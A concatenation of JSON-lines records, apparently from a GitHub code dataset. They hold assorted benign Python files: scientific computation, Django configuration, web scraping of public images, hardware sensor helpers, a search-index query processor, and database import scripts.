save_dir+'/%d_test.png' % i)\n","repo_name":"tsing90/DesignGan","sub_path":"dcgan-custom-rgb-working2.py","file_name":"dcgan-custom-rgb-working2.py","file_ext":"py","file_size_in_byte":10601,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"41"} +{"seq_id":"33407826503","text":"\ndef get_model(model_type):\n if model_type.lower() == \"deeplabv3p\":\n from src.deeplab.networks import DeepLabV3pXc\n return DeepLabV3pXc\n elif model_type.lower() == \"unet\":\n from src.unet.networks import UNet\n return UNet\n elif model_type.lower() in [\"attentionunet\", \"attunet\"]:\n from src.unet.networks import AttentionUNet\n return AttentionUNet\n","repo_name":"SSinyu/Brain-Segmentation","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"41"} +{"seq_id":"2341578792","text":"#!/usr/bin/env python3\nimport math\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"ANGLE\", help=\"The angle at which the projectale was fired\", type=float)\nparser.add_argument(\"SPEED\", help=\"The speed at which the projectale was fired\", type=float)\nparser.add_argument(\"-g\", help=\"Gravitational accelration spped in. Default is 9.8067 m/s^2\", default=9.8067, type=float)\nparser.add_argument(\"-y\", help=\"The starting height of the projectale in meters. Default is 0\",default=0, type=float)\nargs = parser.parse_args()\n\ndef projectleMotion(o: float, v: float, g: float = 9.8067, y: float = 0) -> tuple:\n \"\"\" Calculating ballistic curve based on:\n o - the angle at which the projectale was fired \n v - the speed at which the projectale was fired\n g - gravitational accelration spped in m/s^2\n y - starting height of the projectale\n \n Returned data is a tuple in format = (y, d) where\n d - distance traveled by projectale \n t - time at which projectale traveled d distance\n \"\"\"\n # Calculating distance traveled by projectale\n if o == 45 and y == 0:\n d = (v**2)/g\n elif y == 0:\n d = ((v**2) * math.sin(2*o)) / g\n else:\n d = (v * math.cos(o))/g\n d *= (v * math.sin(o) + math.sqrt((v * math.sin(o))**2 + (2*g*y)))\n\n # Calculating time at which projectale traveled d distance\n if o == 45 and y == 0:\n t = (math.sqrt(2) * v)/g\n else:\n t = d / (v * math.cos(o))\n \n return (d, t)\n\n\nif __name__ == '__main__':\n x,t = projectleMotion(args.ANGLE, args.SPEED, args.g, args.y) \n print(f'Traveled distance: {round(x,2)}m\\nTime of traveled distance: {round(t,2)}s')","repo_name":"k1k9/projectle-montion","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"32325515761","text":"#!/usr/bin/env python\n#\n# Author: Qiming Sun \n#\n\nimport time\nimport numpy\nfrom pyscf import lib\nfrom pyscf.lib import logger\nfrom pyscf.cc import _ccsd\n\n'''\nCCSD(T)\n'''\n\n# t3 as ijkabc\n\n# JCP, 94, 442. Error in Eq (1), should be [ia] >= [jb] >= [kc]\ndef kernel(mycc, eris, t1=None, t2=None, verbose=logger.NOTE):\n if isinstance(verbose, logger.Logger):\n log = verbose\n else:\n log = logger.Logger(mycc.stdout, verbose)\n\n if t1 is None: t1 = mycc.t1\n if t2 is None: t2 = mycc.t2\n\n t1T = t1.T\n t2T = t2.transpose(2,3,0,1)\n\n nocc, nvir = t1.shape\n nmo = nocc + nvir\n e_occ, e_vir = mycc._scf.mo_energy[:nocc], mycc._scf.mo_energy[nocc:]\n eijk = lib.direct_sum('i,j,k->ijk', e_occ, e_occ, e_occ)\n\n eris_ovvv = lib.unpack_tril(eris.ovvv.reshape(nocc*nvir,-1))\n eris_vvov = eris_ovvv.reshape(nocc,nvir,nvir,nvir).transpose(1,2,0,3)\n eris_vooo = eris.ovoo.transpose(1,0,2,3)\n eris_vvoo = eris.ovov.transpose(1,3,0,2)\n def get_w(a, b, c):\n w = numpy.einsum('if,fkj->ijk', eris_vvov[a,b], t2T[c,:])\n w-= numpy.einsum('ijm,mk->ijk', eris_vooo[a,:], t2T[b,c])\n return w\n def get_v(a, b, c):\n return numpy.einsum('ij,k->ijk', eris_vvoo[a,b], t1T[c])\n\n et = 0\n for a in range(nvir):\n for b in range(a+1):\n for c in range(b+1):\n d3 = eijk - e_vir[a] - e_vir[b] - e_vir[c]\n if a == c: # a == b == c\n d3 *= 6\n elif a == b or b == c:\n d3 *= 2\n\n wabc = get_w(a, b, c)\n wacb = get_w(a, c, b)\n wbac = get_w(b, a, c)\n wbca = get_w(b, c, a)\n wcab = get_w(c, a, b)\n wcba = get_w(c, b, a)\n vabc = get_v(a, b, c)\n vacb = get_v(a, c, b)\n vbac = get_v(b, a, c)\n vbca = get_v(b, c, a)\n vcab = get_v(c, a, b)\n vcba = get_v(c, b, a)\n zabc = r3(wabc + .5 * vabc) / d3\n zacb = r3(wacb + .5 * vacb) / d3\n zbac = r3(wbac + .5 * vbac) / d3\n zbca = r3(wbca + .5 * vbca) / d3\n zcab = r3(wcab + .5 * vcab) / d3\n zcba = r3(wcba + .5 * vcba) / d3\n\n et+= numpy.einsum('ijk,ijk', wabc, zabc)\n et+= numpy.einsum('ikj,ijk', wacb, zabc)\n et+= numpy.einsum('jik,ijk', wbac, zabc)\n et+= numpy.einsum('jki,ijk', wbca, zabc)\n et+= numpy.einsum('kij,ijk', wcab, zabc)\n et+= numpy.einsum('kji,ijk', wcba, zabc)\n\n et+= numpy.einsum('ijk,ijk', wacb, zacb)\n et+= numpy.einsum('ikj,ijk', wabc, zacb)\n et+= numpy.einsum('jik,ijk', wcab, zacb)\n et+= numpy.einsum('jki,ijk', wcba, zacb)\n et+= numpy.einsum('kij,ijk', wbac, zacb)\n et+= numpy.einsum('kji,ijk', wbca, zacb)\n\n et+= numpy.einsum('ijk,ijk', wbac, zbac)\n et+= numpy.einsum('ikj,ijk', wbca, zbac)\n et+= numpy.einsum('jik,ijk', wabc, zbac)\n et+= numpy.einsum('jki,ijk', wacb, zbac)\n et+= numpy.einsum('kij,ijk', wcba, zbac)\n et+= numpy.einsum('kji,ijk', wcab, zbac)\n\n et+= numpy.einsum('ijk,ijk', wbca, zbca)\n et+= numpy.einsum('ikj,ijk', wbac, zbca)\n et+= numpy.einsum('jik,ijk', wcba, zbca)\n et+= numpy.einsum('jki,ijk', wcab, zbca)\n et+= numpy.einsum('kij,ijk', wabc, zbca)\n et+= numpy.einsum('kji,ijk', wacb, zbca)\n\n et+= numpy.einsum('ijk,ijk', wcab, zcab)\n et+= numpy.einsum('ikj,ijk', wcba, zcab)\n et+= numpy.einsum('jik,ijk', wacb, zcab)\n et+= numpy.einsum('jki,ijk', wabc, zcab)\n et+= numpy.einsum('kij,ijk', wbca, zcab)\n et+= numpy.einsum('kji,ijk', wbac, zcab)\n\n et+= numpy.einsum('ijk,ijk', wcba, zcba)\n et+= numpy.einsum('ikj,ijk', wcab, zcba)\n et+= numpy.einsum('jik,ijk', wbca, zcba)\n et+= numpy.einsum('jki,ijk', wbac, zcba)\n et+= numpy.einsum('kij,ijk', wacb, zcba)\n et+= numpy.einsum('kji,ijk', wabc, zcba)\n et *= 2\n log.info('CCSD(T) correction = %.15g', et)\n return et\n\ndef r3(w):\n return (4 * w + w.transpose(1,2,0) + w.transpose(2,0,1)\n - 2 * w.transpose(2,1,0) - 2 * w.transpose(0,2,1)\n - 2 * w.transpose(1,0,2))\n\n\nif __name__ == '__main__':\n from pyscf import gto\n from pyscf import scf\n from pyscf import cc\n\n mol = gto.M()\n numpy.random.seed(12)\n nocc, nvir = 5, 12\n eris = lambda :None\n eris.ovvv = numpy.random.random((nocc,nvir,nvir*(nvir+1)//2)) * .1\n eris.ovoo = numpy.random.random((nocc,nvir,nocc,nocc)) * .1\n eris.ovov = numpy.random.random((nocc,nvir,nocc,nvir)) * .1\n t1 = numpy.random.random((nocc,nvir)) * .1\n t2 = numpy.random.random((nocc,nocc,nvir,nvir)) * .1\n t2 = t2 + t2.transpose(1,0,3,2)\n mf = scf.RHF(mol)\n mcc = cc.CCSD(mf)\n mcc._scf.mo_energy = numpy.arange(nocc+nvir)\n print(kernel(mcc, eris, t1, t2) + 8.4953387936460398)\n\n mol = gto.Mole()\n mol.atom = [\n [8 , (0. , 0. , 0.)],\n [1 , (0. , -.957 , .587)],\n [1 , (0.2, .757 , .487)]]\n\n mol.basis = 'ccpvdz'\n mol.build()\n rhf = scf.RHF(mol)\n rhf.conv_tol = 1e-14\n rhf.scf()\n mcc = cc.CCSD(rhf)\n mcc.conv_tol = 1e-14\n mcc.ccsd()\n\n e3a = kernel(mcc, mcc.ao2mo())\n print(e3a - -0.0033300722698513989)\n\n","repo_name":"mibumi/pyscf","sub_path":"pyscf/cc/ccsd_t_slow.py","file_name":"ccsd_t_slow.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"41"} +{"seq_id":"3011310789","text":"from bs4 import BeautifulSoup, NavigableString, Tag\nfrom urllib.request import urlopen\nimport os\nimport datetime\nimport urllib.request\nimport contextlib\n\nbaseurl = 'http://www.keyakizaka46.com/s/k46o/search/artist?ima=0000'\nindex = urlopen(baseurl)\nhead = index.read()\nhsoup = BeautifulSoup(head, 'lxml')\nbox = hsoup.find('div', {'class':'sorted sort-constellation'})\nmembers = box.findAll('a')\nmemberpages = [line.attrs['href'] for line in members]\n\ndate = hsoup.find('li',{'class':'news'}).find('a').attrs['href'].rsplit('=', 1)[1]\ndir = '/Users/Bill/Desktop/LL/欅坂手書き/%s/' % date\nprint(dir)\ninput(\"Continue:\")\nif not os.path.exists(dir):\n os.makedirs(dir)\n\nwith open(os.path.join(dir, '%s_tekaki.txt' % date), 'w') as photolinktxt:\n for line in memberpages:\n link = 'http://www.keyakizaka46.com' + line\n\n with contextlib.closing(urlopen(link)) as handle:\n html = handle.read()\n soup = BeautifulSoup(html, 'lxml')\n\n name = soup.find('p',{'class':'name'}).get_text().strip()\n # name = name + '_手書き_' + date + '.jpg'\n\n imgsrc = soup.find('div',{'class':'box-msg'}).find('img')\n if imgsrc is None:\n print(link)\n continue\n tekaki = imgsrc.attrs['src']\n name = name + '_手書き_' + date + str(tekaki).split('/')[-1]\n imgpath = os.path.join(dir, name)\n urllib.request.urlretrieve(tekaki, imgpath)\n photolinktxt.write(str(tekaki) + '\\n')\nphotolinktxt.close()\n","repo_name":"WatanabeMiho/SakamichiOfficialBlogCrawler","sub_path":"tekaki.py","file_name":"tekaki.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"40673196297","text":"\"\"\"URL configuration for the OpenAPI documentation endpoints.\"\"\"\n\nfrom django.conf.urls import url\nfrom django.urls import reverse_lazy\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\nfrom rest_framework import permissions\n\nSchemaView = get_schema_view(\n openapi.Info(\n title=\"Don't Panic API!\",\n default_version='v1',\n description=\"A Pandemic Kitchen Inventory Manager\",\n terms_of_service=reverse_lazy('legal_tos'),\n contact=openapi.Contact(email=\"niall@niallbyrne.ca\"),\n license=openapi.License(name=\"MPL 2.0 License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n url(\n r'^swagger(?P\\.json|\\.yaml)$',\n SchemaView.without_ui(cache_timeout=0),\n name='schema-json'\n ),\n url(\n r'^swagger/$',\n SchemaView.with_ui('swagger', cache_timeout=0),\n name='schema-swagger-ui'\n ),\n]\n","repo_name":"grocerypanic/grocerypanic-backend","sub_path":"panic/root/urls/openapi.py","file_name":"openapi.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"70985499323","text":"import csv\nimport tempfile\nfrom typing import List\nfrom datetime import datetime as dt\nfrom io import StringIO\n# import hug\nfrom marshmallow import fields\nfrom . import models\nfrom . import sample\n\n# *source* refers to details with \"beneficiary\" at the beginning in template\n# *bank* refers to details with \"bank\" at the beginning in the template\n# instrument date is transfer.date\n# debit and credit reference format = JANUARY 2014 PAYMENT\n\n\ndef gen_instr(transfers: List[models.TransferDetails]):\n with open(\"test_data.csv\", \"w\", newline=\"\") as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(\n [\"H\", \"CORPORATE\", \"H2HPAY\",\n \"\", \"\", \"{:%d%m%Y}\".format(dt.now()), \"SALARYJAN2019\"]\n )\n for transfer in transfers:\n csvwriter.writerow(\n [\"D\", transfer.source.reference]\n + [\"\"] * 2\n + [transfer.source.bene_name]\n + [\"\"] * 3\n + [\n transfer.source.bank,\n transfer.source.branch,\n \"\", \"\",\n transfer.dest.country,\n transfer.source.debit_acc_number,\n transfer.source.currency,\n \"\",\n transfer.source.address,\n transfer.source.country,\n \"\",\n transfer.source.city,\n ]\n + [\"\"] * 22\n + [transfer.source.debit_acc_number, transfer.dest.currency]\n + [\"\"] * 3\n + [transfer.amount, \"\", transfer.activation_date, transfer.date]\n + [\"\"] * 9\n + [transfer.debit_reference,\n \"\",\n transfer.credit_reference]\n + [\"\"] * 7\n )\n csvwriter.writerow(\n [\"T\", len(transfers), sum(t.amount for t in transfers), \"\", \"\"]\n )\n csvwriter.writerow(\n [\"\", \"\", \"\", \"\", \"\"]\n )\n csvwriter.writerow(\n [\"\", \"\", \"\", \"\", \"\"]\n )\n csvwriter.writerow(\n [\"H\", \"CLIENT CODE\", \"H2HPAY\",\n \"\", \"\", \"Payment Date\", \"PIR Reference\"]\n )\n csvwriter.writerow(\n [\"D\", \"Instrument Reference\"]\n + [\"\"] * 2\n + [\"Name of Beneficiary\"]\n + [\"\"] * 3\n + [\n \"Beneficiary Bank\",\n \"Beneficiary Branch\",\n \"\", \"\",\n \"Bank Country\",\n \"Beneficiary Account Number\",\n \"Beneficiary Account Currency\",\n \"\",\n \"Beneficiary Address\",\n \"Beneficiary Country\",\n \"\",\n \"Beneficiary City\",\n ]\n + [\"\"] * 22\n + [\"Debit Account Number\", \"Payment Currency\"]\n + [\"\"] * 3\n + [\"Payment Amount\", \"\", \"Acctivation Date\", \"Instrument Date\"]\n + [\"\"] * 9\n + [\"Debit Reference\",\n \"\",\n \"Credit Reference\"]\n + [\"\"] * 7\n )\n csvwriter.writerow(\n [\"T\", len(transfers), sum(t.amount for t in transfers), \"\", \"\"]\n )\n\n\n# @hug.post(\"/transactiondetails\")\n# def transactiondetails(\n# transfers: hug.types.MarshmallowInputSchema(models.TransferDetailsSchema(many=True))\n# ) -> models.CSVResponse():\n\n# return {\"csv\": gen_instr([sample.TRANSFER])}\n","repo_name":"EnaSmoak/write_to_csv","sub_path":"omni/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"29688834337","text":"from django.db import models\nfrom django.core.validators import RegexValidator\nfrom django.utils.translation import gettext_lazy as _\nimport re\n\n\nclass ColorField(models.CharField):\n default_validators = []\n\n def __init__(self, *args, **kwargs):\n colorRE = re.compile(\"#([A-Fa-f0-9]{8})$\")\n self.default_validators.append(\n RegexValidator(\n colorRE, _(\"Enter a valid hexA color, eg. #00000000\"), \"invalid\"\n )\n )\n\n kwargs.setdefault(\"max_length\", 9)\n super().__init__(*args, **kwargs)\n","repo_name":"Sluggo-Issue-Tracker/Sluggo-API","sub_path":"api/models/fields/color_field.py","file_name":"color_field.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"41"} +{"seq_id":"71696082365","text":"from django.test import TestCase\nfrom abclist.models import ABCList\n\nclass ABCListTestCase(TestCase):\n def setUp(self):\n ABCList.objects.create(user='twe', abclist={'a':\"Alpha\", 'b': \"Beta\"})\n ABCList.objects.create(user='twe', abclist={'c': \"Ceta\", 'd': \"Delta\"})\n\n def test_abclist_encoding(self):\n \"\"\"The abclist is encoded correcty as JSON dump\"\"\"\n abcs = ABCList.objects.all()[:1].get()\n\n expected_dict = {'a': 'Alpha', 'b': 'Beta'}\n self.assertEqual(abcs.abclist, expected_dict)\n\n","repo_name":"h4p/abc-list-backend","sub_path":"abclist/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"30695970252","text":"from django.template import Library\n\nregister = Library()\n\n\n@register.simple_tag\ndef get_object_properties(object, properties):\n \"\"\"Return first non empty property of given object.\"\"\"\n properties = properties.split(\",\")\n for property in properties:\n attribute = getattr(object, property, \"\")\n if attribute:\n return getattr(object.translated, property)\n return \"\"\n","repo_name":"mirumee/legacy-views","sub_path":"saleor/core/templatetags/attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"41"} +{"seq_id":"26781882969","text":"from collections import deque\n\nopen_card = []\nanswer = float('inf')\ndir = [(-1, 0), (1, 0), (0, -1), (0, 1)]\nN = 4\n\ndef find(board, r, c, cnt):\n global open_card, answer\n print(board, cnt, open_card)\n\n\n state = True\n for i in range(N):\n for j in range(N):\n if board[i][j] != 0:\n state = False\n break\n\n if state:\n answer = min(answer, cnt)\n return\n\n for dx, dy in dir:\n for i in range(1, N+1):\n if 0 <= r + dx*i < N and 0 <= c + dy*i < N and board[r+dx*i][c+dy*i] != 0:\n if not open_card: # opencard가 없을 경우\n open_card.append((board[r+dx*i][c+dy*i], r+dx*i, c+dy*i))\n find(board, r+dx*i, c+dy*i, cnt+2)\n open_card.pop()\n break\n else: # opencard가 있을경우\n if not(open_card[0][1] == r+dx*i and open_card[0][2] == c+dy*i): # opencard 랑 다른 위치의 카드일 경우\n if open_card[0][0] != board[r+dx*i][c+dy*i]: # 현재 위치의 카드랑 다를 경우\n find(board, r+dx*i, c+dy*i, cnt+1)\n break\n else: # 현재 위치의 카드랑 opencard가 같을경우\n tmp = board[r+dx*i][c+dy*i]\n open_card_num, open_x, open_y = open_card.pop()\n board[r+dx*i][c+dy*i] = 0\n board[open_x][open_y] = 0\n find(board, r+dx*i, c+dy*i, cnt+2)\n board[r+dx*i][c+dy*i] = tmp\n board[open_x][open_y] = tmp\n open_card.append((open_card_num, open_x, open_y))\n break\n\ndef solution(board, r, c):\n find(board, r, c, 0)\n \n return answer\n\nboard = [[1,0,0,3],[2,0,0,0],[0,0,0,2],[3,0,1,0]]\nr, c = 1, 0\nboard = [[3,0,0,2],[0,0,1,0],[0,1,0,0],[2,0,0,3]]\nr, c = 0, 1\nprint(solution(board, r, c))\n\n\n","repo_name":"SeoHyungjun/Coding_Test","sub_path":"programmers/2021카카오블라인드채용/카드짝맞추기/카드짝맞추기.py","file_name":"카드짝맞추기.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"11505453760","text":"import RPi.GPIO as GPIO\nimport spidev\nimport time\nimport os\nimport sys\nfrom datetime import datetime\n\nspi = spidev.SpiDev()\nspi.open(0,0)\n\n# global variables\ncount = 1\nfrequ = 0.5\nstop_pressed = True\nplay = True\nclear_reset = False\n\ndef GetData(channel):\n spi.max_speed_hz = 1350000\n adc = spi.xfer2([1,(8+channel)<<4,0])\n data = ((adc[1]&3)<<8)+adc[2]\n return data\n\ndef ConvertVolts(data,places):\n volts = (data*3.3)/float(1023)\n volts = round(volts,places)\n return volts\n\ndef PotVolts(data,places):\n v = ConvertVolts(data,places)\n return v\n\ndef ConvertTemp(data,places):\n volt = ConvertVolts(data,places)\n Temp = (volt-0.5)/0.01\n Temp = round(Temp,places)\n return Temp\n\ndef LightPercent(data,places):\n V = ConvertVolts(data,places)\n Percent = (V/3)*100\n return Percent\n","repo_name":"Hungwe/eee3096s_prac4","sub_path":"Prac_4_code.py","file_name":"Prac_4_code.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"12255918113","text":"from IOfilesHandler import inputHandler, outputHandler\nfrom invertedIndex import postingsHandler\nfrom TFIDF import scoreCounter, termCounter\nfrom queryHandler import queryOR, queryAND\nfrom permutationIndex import RotationsCreator, permutationIndexCreator\n\n\ndef process_query(postings_dict, main_file_name='sample.txt', query_file_name='query.txt', result_file_name='result.txt'):\n all_queries_list = inputHandler.split_query(query_file_name)\n [docs_for_TFIDF_dict, term_counts_in_docs_dict] = TFIDF_preparation(main_file_name)\n for query in all_queries_list:\n selected_postings_dict = postingsHandler.get_all_postings_by_query(postings_dict, query)\n intercept_with_skips_list = queryAND.query_and(selected_postings_dict)\n join_postings_list = queryOR.query_or(selected_postings_dict)\n ranked_intercept_postings_list = scoreCounter.create_ranked_posting_list(docs_for_TFIDF_dict, term_counts_in_docs_dict, selected_postings_dict, intercept_with_skips_list)\n ranked_joining_postings_list = scoreCounter.create_ranked_posting_list(docs_for_TFIDF_dict, term_counts_in_docs_dict, selected_postings_dict, join_postings_list)\n outputHandler.write_selected_postings(selected_postings_dict, result_file_name)\n outputHandler.write_query(query, intercept_with_skips_list, result_file_name, 'QueryAnd') # write and query\n outputHandler.write_query(query, ranked_intercept_postings_list, result_file_name, 'TF-IDF') # write TF-IDF ranked list\n outputHandler.write_query(query, join_postings_list, result_file_name, 'QueryOr') # write or query\n outputHandler.write_query(query, ranked_joining_postings_list, result_file_name, 'TF-IDF') # write TF-IDF ranked list\n\n\ndef TFIDF_preparation(main_file_name):\n # docs_for_TFIDF_dict = { docid : ['word1', 'word2', 'word3', ... ] }\n docs_for_TFIDF_dict = inputHandler.create_docs_terms_dict(main_file_name)\n # Example: {'1000': Counter({'Thi': 1, 'Jane': 1, 'Austen': 1}), '1001': Counter({'is': 2, 'This': 1, 's': 1}), ...}\n term_counts_in_docs_dict = termCounter.each_term_count_in_doc(docs_for_TFIDF_dict)\n return docs_for_TFIDF_dict, term_counts_in_docs_dict\n\n\ndef process_substitute_query(postings_dict, template_file_name='template.txt', result_file_name='result.txt'):\n all_template_list = inputHandler.split_query(template_file_name)\n rotations_dict = RotationsCreator.create_rotations(postings_dict.keys())\n for template_list in all_template_list:\n for template in template_list:\n result_postings = permutationIndexCreator.get_postings_by_template(postings_dict, rotations_dict, template)\n outputHandler.write_wild_card(template, result_postings, result_file_name)\n","repo_name":"Markvarte/data-processing-and-search","sub_path":"queryHandler/queryProcessor.py","file_name":"queryProcessor.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"12132487462","text":"string1 = 'abccba'\n\ndef polindrome(text):\n\td = {}\n\tfor i in range(len(text)):\n\t\tif text[i] not in d:\n\t\t\td[text[i]] = 1\n\t\telse:\n\t\t\td[text[i]] += 1\n\tprint(d)\n\tif len(d) == 0:\n\t\treturn True\n\treturn False\n\nprint(polindrome(string1))\n\n##############\nfrom collections import Counter\n\ndef anagramCheck(text1, text2):\n\td1 = {}\n\tfor i in text1:\n\t\tif i not in d1 and i != ' ':\n\t\t\td1[i] = 1\n\t\telif i != ' ':\n\t\t\td1[i] += 1\n\td2 = {}\n\tfor i in text2:\n\t\tif i not in d2 and i != ' ':\n\t\t\td2[i] = 1\n\t\telif i != ' ':\n\t\t\td2[i] += 1\n\treturn d1 == d2\n\nprint(anagramCheck(string1, string2))","repo_name":"1JigSaW/books","sub_path":"CrackingTheCodingInterview/1.5.py","file_name":"1.5.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"6642552366","text":"import time\nimport board\nimport audioio\nimport digitalio\nimport math\nimport array\nimport touchio\n\n\n# enable speaker\nspeakerswitch = digitalio.DigitalInOut(board.SPEAKER_ENABLE)\nspeakerswitch.direction = digitalio.Direction.OUTPUT\nspeakerswitch.value = True\n\n\n# define speaker\nspeaker = audioio.AudioOut(board.SPEAKER)\n\n# define playing function\ndef playtone(num):\n # generate one period of sine wav (C,D,E,F,G,A,B)\n frequency = array.array(\"i\",[261,293,329,349,392,440,493])\n length = 8000 // frequency[num-1]\n sine_wave = array.array(\"h\", [0] * length)\n\n for i in range(length):\n sine_wave[i] = int(math.sin(math.pi * 2 * i / 18) * (2 ** 15))\n sound = audioio.RawSample(sine_wave)\n # play the sound\n if speaker.playing == False:\n speaker.play(sound, loop = True)\n\n# define stop playing function\ndef audiostop():\n if speaker.playing:\n speaker.stop()\n\n# define touch pad 1 - 7\ntouch1 = touchio.TouchIn(board.A1)\ntouch2 = touchio.TouchIn(board.A2)\ntouch3 = touchio.TouchIn(board.A3)\ntouch4 = touchio.TouchIn(board.A4)\ntouch5 = touchio.TouchIn(board.A5)\ntouch6 = touchio.TouchIn(board.A6)\ntouch7 = touchio.TouchIn(board.A7)\n\n\n# loop forever\nwhile True:\n\n #if the pin is touched\n if touch1.value:\n print(\"A1\")\n playtone(1)\n if touch2.value:\n print(\"A2\")\n playtone(2)\n if touch3.value:\n print(\"A3\")\n playtone(3)\n if touch4.value:\n print(\"A4\")\n playtone(4)\n if touch5.value:\n print(\"A5\")\n playtone(5)\n if touch6.value:\n print(\"A6\")\n playtone(6)\n if touch7.value:\n print(\"A7\")\n playtone(7)\n\n # stop playing if nothing is touched \n if touch1.value == False and touch2.value == False and touch3.value == False and touch4.value == False and touch5.value == False and touch6.value == False and touch7.value == False:\n audiostop()\n\ntime.sleep(0.01)\n","repo_name":"pvanallen/circuit-python-cpx-examples","sub_path":"pythonbasics/capacitive_touch.py","file_name":"capacitive_touch.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"32258330316","text":"\"\"\"\nCreated on Thu Aug 14 11:33:18 2014\n\n@author: Maurizio Napolitano \n\"\"\"\nfrom dbxmlmibact import DBMibac,LuoghiCultura, Indirizzi, Extra, Allegati, Links, TipologiaLuoghi\nfrom managexmlmibac import MibacData\nimport os\n\ndata = MibacData()\nmibac = data.getalldata()\n#mibac = data.getmibacdata(1,\"musei\",0,1000)\ndb = DBMibac(os.getcwd(),\"luoghicultura\")\n\nluoghi = []\ntipi = MibacData.tipologialuoghi\nfor t in tipi.viewkeys():\n id = int(t)\n nome = tipi[id]\n tiposql = TipologiaLuoghi(idtipo=id,nome=nome)\n db.add(tiposql)\n \nfor m in mibac:\n #Accessibilita(accessibilita=m.accessibilita)\n\n #links\n #codice_dbunico2, url,ruolo, titolo,descrizione,descrizione\n if len(m.links)>0:\n for link in m.links:\n if (len(link)>0):\n for l in link:\n url = \"\"\n titolo = \"\"\n descrizione = \"\"\n tipo = \"\"\n if l.has_key('url'):\n url = l['url']\n if l.has_key('titolo'):\n titolo = l['titolo']\n if l.has_key('descrizione'):\n descrizione = l['descrizione']\n if l.has_key('tipo'):\n tipo = l['tipo']\n linkssql = Links(codice_dbunico2=m.codice_dbunico2,url=url,titolo=titolo,descrizione=descrizione,tipo=descrizione)\n db.add(linkssql)\n \n #Allegati\n #codice_dbunico2, copyright, url, ruolo, didascalia,mibacallegato,descrizione\n if len(m.allegati)>0:\n for allegato in m.allegati:\n if (len(allegato)>0):\n allegatisql = Allegati(codice_dbunico2=m.codice_dbunico2,copyright=allegato['copyright'], url=allegato['url'], ruolo=allegato['ruolo'], \n didascalia=allegato['didascalia'],mibacidallegato=allegato['mibacidallegato'],descrizione=allegato['descrizione'])\n db.add(allegatisql)\n \n #Extra: tipologia,categoria,traduzioni varie, contenitori\n \n if (len(m.contenitori)>0):\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"contenitori\",attributo='denominazione',valore=m.contenitori['denominazione'])\n db.add(extrasql)\n \n if len(m.categorie) > 0:\n for c in range(len(m.categorie)):\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"categoria\",attributo=c,valore=m.categorie[c])\n db.add(extrasql)\n \n if len(m.tipologie) > 0:\n for t in range(len(m.tipologie)):\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"tipologia\",attributo=t,valore=m.tipologie[t])\n db.add(extrasql)\n\n if len(m.sinonimi) > 0:\n for s in range(len(m.sinonimi)):\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"sinomimo\",attributo=s,valore=m.sinonimi[s])\n db.add(extrasql)\n \n if len(m.traduzioni_descrizione) > 0:\n for t in m.traduzioni_descrizione:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_descrizione\",attributo=t,valore=m.traduzioni_descrizione[t])\n db.add(extrasql)\n\n if len(m.traduzioni_chiusurasettimanale) > 0:\n for t in m.traduzioni_chiusurasettimanale:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_chiusurasettimanale\",attributo=t,valore=m.traduzioni_chiusurasettimanale[t])\n db.add(extrasql)\n\n if len(m.traduzioni_costo_biglietto) > 0:\n for t in m.traduzioni_costo_biglietto:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_costo_biglietto\",attributo=t,valore=m.traduzioni_costo_biglietto[t])\n db.add(extrasql) \n\n if len(m.traduzioni_fax_biglietteria) > 0:\n for t in m.traduzioni_fax_biglietteria:\n extrasql = Extra(codice_dbunico2=m.codice_dbunico2,tipo=\"traduzioni_costo_biglietto\",attributo=t,valore=m.traduzioni_fax_biglietteria[t])\n db.add(extrasql) \n \n if len(m.traduzioni_orario) > 0:\n for t in m.traduzioni_orario:\n extrasql = 